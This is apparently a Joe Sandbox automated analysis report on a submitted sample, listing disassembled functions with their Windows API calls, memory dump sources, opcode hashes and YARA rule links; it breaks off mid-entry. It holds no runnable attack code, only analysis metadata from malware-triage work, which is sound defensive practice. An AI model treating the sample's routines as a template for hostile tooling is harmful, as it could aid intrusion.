                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: f3fe2c36269cc938479b38a7e2e23c6c5c164352dc0781a7abf4855c2a174c17
                                                            • Instruction ID: b03e137dea239ac2a108867f86e55a235b9d6f9e39e81e186b8e46c13b0ef048
                                                            • Opcode Fuzzy Hash: f3fe2c36269cc938479b38a7e2e23c6c5c164352dc0781a7abf4855c2a174c17
                                                            • Instruction Fuzzy Hash: B3A011C22A8082BCB00823A22C82C3B02ACC0C0B20B308BAEF822800C0BA8088080830
                                                            Function 00BEE58E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE580
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 81a1c72d932be4a8830e4c797792409e92c72f601b3a8486841994813127b89a
                                                            • Instruction ID: b03e137dea239ac2a108867f86e55a235b9d6f9e39e81e186b8e46c13b0ef048
                                                            • Opcode Fuzzy Hash: 81a1c72d932be4a8830e4c797792409e92c72f601b3a8486841994813127b89a
                                                            • Instruction Fuzzy Hash: B3A011C22A8082BCB00823A22C82C3B02ACC0C0B20B308BAEF822800C0BA8088080830
                                                            Function 00BEE573 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE580
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: d0f09daa95efe89e7858837f32d19ae9f9c0265833be6b6f24e9f8ce87713ee3
                                                            • Instruction ID: f9e4576e9ea6a981097b8f59dff244f082a4516a9f32fadc0aab48abf25997e4
                                                            • Opcode Fuzzy Hash: d0f09daa95efe89e7858837f32d19ae9f9c0265833be6b6f24e9f8ce87713ee3
                                                            • Instruction Fuzzy Hash: 3AA011C22A80803CB00823A22C82C3B02ACC0E0B22B3083AEF820A00C0BA8088080830
                                                            Function 00BEE569 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 6d6f84fce9d6fd765e275c061240c6bd85759acdda8ed0383bf22aafc33e4384
                                                            • Instruction ID: cf50fa866db7c662458ae860af32f393ef7fc6027cdbdf12244d0cd71bb0b94c
                                                            • Opcode Fuzzy Hash: 6d6f84fce9d6fd765e275c061240c6bd85759acdda8ed0383bf22aafc33e4384
                                                            • Instruction Fuzzy Hash: 51A011C22A8882BCB00822022CA2C3B028CC8C2F20B308AAEF822800C0BA808C080830
                                                            Function 00BEE55F Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 9487da6faf625ccf51f6dfe798884af3cf0b605fe696301191242dd5901d7e5e
                                                            • Instruction ID: cf50fa866db7c662458ae860af32f393ef7fc6027cdbdf12244d0cd71bb0b94c
                                                            • Opcode Fuzzy Hash: 9487da6faf625ccf51f6dfe798884af3cf0b605fe696301191242dd5901d7e5e
                                                            • Instruction Fuzzy Hash: 51A011C22A8882BCB00822022CA2C3B028CC8C2F20B308AAEF822800C0BA808C080830
                                                            Function 00BEE555 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 333e260cd313c2ac080c3bee9b82c09e5dd99672f293c3ed43823eb50fc34835
                                                            • Instruction ID: cf50fa866db7c662458ae860af32f393ef7fc6027cdbdf12244d0cd71bb0b94c
                                                            • Opcode Fuzzy Hash: 333e260cd313c2ac080c3bee9b82c09e5dd99672f293c3ed43823eb50fc34835
                                                            • Instruction Fuzzy Hash: 51A011C22A8882BCB00822022CA2C3B028CC8C2F20B308AAEF822800C0BA808C080830
                                                            Function 00BEE541 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ___delayLoadHelper2@8.DELAYIMP ref: 00BEE51F
                                                              • Part of subcall function 00BEE85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00BEE8D0
                                                              • Part of subcall function 00BEE85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00BEE8E1
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                            • String ID:
                                                            • API String ID: 1269201914-0
                                                            • Opcode ID: 3d4273609fd5a8aeafe2196127c14055d48feb3da257c3884e51b2ccdbff2658
                                                            • Instruction ID: cf50fa866db7c662458ae860af32f393ef7fc6027cdbdf12244d0cd71bb0b94c
                                                            • Opcode Fuzzy Hash: 3d4273609fd5a8aeafe2196127c14055d48feb3da257c3884e51b2ccdbff2658
                                                            • Instruction Fuzzy Hash: 51A011C22A8882BCB00822022CA2C3B028CC8C2F20B308AAEF822800C0BA808C080830
                                                            Function 00BD9F09 Relevance: 1.5, APIs: 1, Instructions: 7fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetEndOfFile.KERNELBASE(?,00BD903E,?,?,-00000870,?,-000018B8,00000000,?,-000028B8,?,00000800,-000028B8,?,00000000,?), ref: 00BD9F0C
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: File
                                                            • String ID:
                                                            • API String ID: 749574446-0
                                                            • Opcode ID: e5f29f4a60a7c7bad23a1c4ce20c7d76e3b597a9aa4f71dca911cfb4b747a689
                                                            • Instruction ID: 1b33539cca310cb9a2533ae27e475016f7352ed8f859f14179d022306e68c09f
                                                            • Opcode Fuzzy Hash: e5f29f4a60a7c7bad23a1c4ce20c7d76e3b597a9aa4f71dca911cfb4b747a689
                                                            • Instruction Fuzzy Hash: 06A0223008000E8BCE002B30CE0830E3B20FB20BC830202E8A00BCF0B2CB23880BCB20
                                                            Function 00BEAC04 Relevance: 1.5, APIs: 1, Instructions: 5COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetCurrentDirectoryW.KERNELBASE(?,00BEAE72,C:\Users\user\Desktop,00000000,00C1946A,00000006), ref: 00BEAC08
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CurrentDirectory
                                                            • String ID:
                                                            • API String ID: 1611563598-0
                                                            • Opcode ID: a0ca77b27d691014841627196638469abbbd56a5fc46e6c8bdbe7f4460c19666
                                                            • Instruction ID: 44e999f6003b173c849f4863f7f55c6fde1b57410d3524db5b34f838c4614b8e
                                                            • Opcode Fuzzy Hash: a0ca77b27d691014841627196638469abbbd56a5fc46e6c8bdbe7f4460c19666
                                                            • Instruction Fuzzy Hash: CBA011302082808BC2000B328F0AB0EBAAAAFA2B00F02C028A00088030CB30C820EA00
                                                            Function 00BD9620 Relevance: 1.3, APIs: 1, Instructions: 30COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • CloseHandle.KERNELBASE(000000FF,?,?,00BD95D6,?,?,?,?,?,00C02641,000000FF), ref: 00BD963B
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: CloseHandle
                                                            • String ID:
                                                            • API String ID: 2962429428-0
                                                            • Opcode ID: 353d631f08a9fbd85f5018b410b4a75e8e5d058aa264a6e0799c935aef09485d
                                                            • Instruction ID: bd41e73ad9a1af0b697cbebae31e1f32879c1dc88dfac60303a7d9c55e2ec870
                                                            • Opcode Fuzzy Hash: 353d631f08a9fbd85f5018b410b4a75e8e5d058aa264a6e0799c935aef09485d
                                                            • Instruction Fuzzy Hash: A1F08970485B559FDB308E24C458792F7E8EB13325F045B9FD4E742AE0E761A98DDB40

                                                            Non-executed Functions

                                                            Function 00BEC220 Relevance: 49.3, APIs: 25, Strings: 3, Instructions: 286timewindowfileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00BD1316: GetDlgItem.USER32(00000000,00003021), ref: 00BD135A
                                                              • Part of subcall function 00BD1316: SetWindowTextW.USER32(00000000,00C035F4), ref: 00BD1370
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 00BEC2B1
                                                            • EndDialog.USER32(?,00000006), ref: 00BEC2C4
                                                            • GetDlgItem.USER32(?,0000006C), ref: 00BEC2E0
                                                            • SetFocus.USER32(00000000), ref: 00BEC2E7
                                                            • SetDlgItemTextW.USER32(?,00000065,?), ref: 00BEC321
                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00BEC358
                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00BEC36E
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00BEC38C
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BEC39C
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BEC3B8
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BEC3D4
                                                            • _swprintf.LIBCMT ref: 00BEC404
                                                              • Part of subcall function 00BD4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00BD40A5
                                                            • SetDlgItemTextW.USER32(?,0000006A,?), ref: 00BEC417
                                                            • FindClose.KERNEL32(00000000), ref: 00BEC41E
                                                            • _swprintf.LIBCMT ref: 00BEC477
                                                            • SetDlgItemTextW.USER32(?,00000068,?), ref: 00BEC48A
                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 00BEC4A7
                                                            • FileTimeToLocalFileTime.KERNEL32(?,?,?), ref: 00BEC4C7
                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00BEC4D7
                                                            • GetTimeFormatW.KERNEL32(00000400,00000002,?,00000000,?,00000032), ref: 00BEC4F1
                                                            • GetDateFormatW.KERNEL32(00000400,00000000,?,00000000,?,00000032), ref: 00BEC509
                                                            • _swprintf.LIBCMT ref: 00BEC535
                                                            • SetDlgItemTextW.USER32(?,0000006B,?), ref: 00BEC548
                                                            • _swprintf.LIBCMT ref: 00BEC59C
                                                            • SetDlgItemTextW.USER32(?,00000069,?), ref: 00BEC5AF
                                                              • Part of subcall function 00BEAF0F: GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 00BEAF35
                                                              • Part of subcall function 00BEAF0F: GetNumberFormatW.KERNEL32(00000400,00000000,?,00C0E72C,?,?), ref: 00BEAF84
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: ItemTime$File$Text$Format$_swprintf$MessageSend$DateFindLocalSystem$CloseDialogFirstFocusInfoLocaleNumberWindow__vswprintf_c_l
                                                            • String ID: %s %s$%s %s %s$REPLACEFILEDLG
                                                            • API String ID: 797121971-1840816070
                                                            • Opcode ID: abe1f1c34d9a9c0d3a88a095bc66c22de1975010582b9a0e1b3e2fdaaaecef10
                                                            • Instruction ID: 6beddcca928b612598a31b8c7c0fb9a88037c24707ea7158f09e008cedbf76cd
                                                            • Opcode Fuzzy Hash: abe1f1c34d9a9c0d3a88a095bc66c22de1975010582b9a0e1b3e2fdaaaecef10
                                                            • Instruction Fuzzy Hash: F1917372248384BBD2219BA1CC89FFF7BECEB49704F044859F749D6181E775E6058B62
                                                            Function 00BD6FAA Relevance: 28.3, APIs: 12, Strings: 4, Instructions: 328fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • __EH_prolog.LIBCMT ref: 00BD6FAA
                                                            • _wcslen.LIBCMT ref: 00BD7013
                                                            • _wcslen.LIBCMT ref: 00BD7084
                                                              • Part of subcall function 00BD7A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00BD7AAB
                                                              • Part of subcall function 00BD7A9C: GetLastError.KERNEL32 ref: 00BD7AF1
                                                              • Part of subcall function 00BD7A9C: CloseHandle.KERNEL32(?), ref: 00BD7B00
                                                              • Part of subcall function 00BDA1E0: DeleteFileW.KERNELBASE(000000FF,?,?,00BD977F,?,?,00BD95CF,?,?,?,?,?,00C02641,000000FF), ref: 00BDA1F1
                                                              • Part of subcall function 00BDA1E0: DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00BD977F,?,?,00BD95CF,?,?,?,?,?,00C02641), ref: 00BDA21F
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000001,00000080,00000000,?,?,00000001,?), ref: 00BD7139
                                                            • CloseHandle.KERNEL32(00000000), ref: 00BD7155
                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000003,02200000,00000000), ref: 00BD7298
                                                              • Part of subcall function 00BD9DA2: FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00BD73BC,?,?,?,00000000), ref: 00BD9DBC
                                                              • Part of subcall function 00BD9DA2: SetFileTime.KERNELBASE(?,?,?,?), ref: 00BD9E70
                                                              • Part of subcall function 00BD9620: CloseHandle.KERNELBASE(000000FF,?,?,00BD95D6,?,?,?,?,?,00C02641,000000FF), ref: 00BD963B
                                                              • Part of subcall function 00BDA4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA501
                                                              • Part of subcall function 00BDA4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00BDA325,?,?,?,00BDA175,?,00000001,00000000,?,?), ref: 00BDA532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3983180755-3508440684
                                                            • Opcode ID: 991afecd1de1a85c82db960b60f4ba0c9cfadc18491977fccef412c36ab1eeff
                                                            • Instruction ID: 05b8f3a725995783123fd253346bb56f3bcb2da8d691de8020d5dd4567e3c787
                                                            • Opcode Fuzzy Hash: 991afecd1de1a85c82db960b60f4ba0c9cfadc18491977fccef412c36ab1eeff
                                                            • Instruction Fuzzy Hash: 77C1B371944644AADB25DB74CC81FEEF7E8EF04304F00459BFA56A7282FB34AA44CB61
                                                            Function 00BFD8EE Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: __floor_pentium4
                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                            • API String ID: 4168288129-2761157908
                                                            • Opcode ID: ec9b038032efef3781e391d607a4c679e8d88beeaecfc90d8c9673aa3eef6a66
                                                            • Instruction ID: 34bc75a8f66b0fcf88d04679ca103d6b693242c21c5467616c4329ddb722f8ca
                                                            • Opcode Fuzzy Hash: ec9b038032efef3781e391d607a4c679e8d88beeaecfc90d8c9673aa3eef6a66
                                                            • Instruction Fuzzy Hash: CDC22771E0862C8BDB25CE289D807BAB7F5EB84304F1541EAD65DE7250E774AE898F40
                                                            Function 00BD32F7 Relevance: 9.4, APIs: 2, Strings: 3, Instructions: 608COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1741013244.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1740993484.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741056778.0000000000C03000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C0E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C15000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741079075.0000000000C32000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                            • Associated: 00000000.00000002.1741153738.0000000000C33000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_bd0000_7aHY4r6vXR.jbxd
                                                            Similarity
                                                            • API ID: H_prolog_swprintf
                                                            • String ID: CMT$h%u$hc%u
                                                            • API String ID: 146138363-3282847064
                                                            • Opcode ID: a2e70b326db007a1ca2b8ef3eb2f5cfdaa092064a5ae87c989d716617ae5c6dc
                                                            • Instruction ID: dc7698fc4bd9c75552bdf10154d5ceb4aeef021e258b47f14807e0bd54570c2d
